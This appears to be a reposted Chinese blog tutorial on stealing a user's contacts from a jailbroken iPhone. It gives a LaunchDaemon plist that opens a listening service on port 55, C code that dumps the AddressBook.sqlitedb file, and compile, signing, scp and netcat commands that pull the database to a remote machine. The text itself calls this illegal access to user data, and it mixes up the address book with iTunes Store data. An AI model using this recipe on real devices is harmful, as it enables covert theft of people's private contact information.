iOS攻防:如何窃取用户的通讯录信息

简介

本文章基于念茜的iOS攻防系列。
本文将会讲解如何窃取用户的通讯录信息。
同样在越狱手机环境下。

hack

1. 需要一个plist

需要这样一个plist,它看起来是这样:

iOS攻防:如何窃取用户的通讯录信息_第1张图片
blog_iOSiTunesstore1

源文件是这样:

 



    Program
    /usr/bin/hack
    StandardErrorPath
    /dev/null
    SessionCreate
    
    ProgramArguments

      /usr/bin/hack

inetdCompatibility

      Wait
      

Sockets

      Listeners
      
         SockServiceName
         55
            
        
    

SockServiceName指的是通信名称
将plist文件传送到至iPhone/System/Library/LaunchDaemons/ 下

scp  /Users/zhoulingyu/Desktop/hack.plist [email protected]:/System/Library/LaunchDaemons/hack.plist

2. 了解一下OS X的启动原理

  1. mac固件激活,初始化硬件,加载BootX引导器。
  2. BootX加载内核与内核扩展(kext)。
  3. 内核启动launchd进程。
  4. launchd根据/System/Library/LaunchAgents、/System/Library/LaunchDaemons、/Library/LaunchDaemons、Library/LaunchAgents、~/Library/LaunchAgents里的plist配置,启动服务守护进程

解释一下:

LaunchDaemons是用户未登陆前就启动的服务(守护进程)
LaunchAgents是用户登陆后启动的服务(守护进程)

几个目录下plist文件格式及每个字段的含义:

KEY DESCRIPTION REQUIRED
Label The name of the job yes
ProgramArguments Strings to pass to the program when it is executed yes
UserName The job will be run as the given user, who may not necessarily be the one who submitted it to launchd. no
inetdCompatibility Indicates that the daemon expects to be run as if it were launched by inetd no
Program The path to your executable. This key can save the ProgramArguments key for flags and arguments. no
onDemand A boolean flag that defines if a job runs continuously or not no
RootDirectory The job will be?chrooted?into another directory no
ServiceIPC Whether the daemon can speak IPC to launchd no
WatchPaths Allows launchd to start a job based on modifications at a file-system path no
QueueDirectories Similar to WatchPath, a queue will only watch an empty directory for new files no
StartInterval Used to schedule a job that runs on a repeating schedule. Specified as the number of seconds to wait between runs. no
StartCalendarInterval Job scheduling. The syntax is similar to cron. no
HardResourceLimits Controls restriction of the resources consumed by any job no
LowPriorityIO Tells the kernel that this task is of a low priority when doing file system I/O no
Sockets An array can be used to specify what socket the daemon will listen on for launch on demand no

iOS基本类似,我基本是参照这个来的。

所以上面的plist实际上是要求系统启动一个进程。
一个名为hack的进程,可执行文件的路径是/usr/bin/hack。

3. 编写读取通讯录数据程序

iTunes Store的数据都在/var/mobile/Library/AddressBook/AddressBook.sqlitedb中,只要能能拿出AddressBook.sqlitedb就可以非法拿到用户的数据。

那么现在编写一个程序:

Objective-C


#include   
#include   
#include   
#define FILE "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"  
int  main(){  
    int  fd  =  open(FILE,  O_RDONLY);  
    char  buf[128];  
    int  ret  =  0;  
    if(fd  <  0)  
    return  -1;  
    while  ((  ret  =  read(fd,  buf,  sizeof(buf)))  >  0){  
    write(  fileno(stdout),  buf,  ret);  
    }  
    close(fd);  
    return  0;  
}

用同样的方法编译、传输:

xcrun  -sdk iphoneos clang  -arch armv7  -o  hack hack.c

签名:

ldid  -S  hack
mv hack  /usr/bin

4. 抓取 iTunesstore 数据信息

利用netcat,指定之前定义的服务名称,抓取设备 iTunesstore 信息:

nc  192.168.31.152  55  >  itunesstored2.sqlitedb

OK,在MAC查看一下内容。

作为一个开发者,有一个学习的氛围跟一个交流圈子特别重要这是一个我的iOS交流群:776598941,不管你是小白还是大牛欢迎入驻 ,分享以下资料哦,只要你加群就免费分享哦!

iOS攻防:如何窃取用户的通讯录信息_第2张图片
image

你可能感兴趣的:(iOS攻防:如何窃取用户的通讯录信息)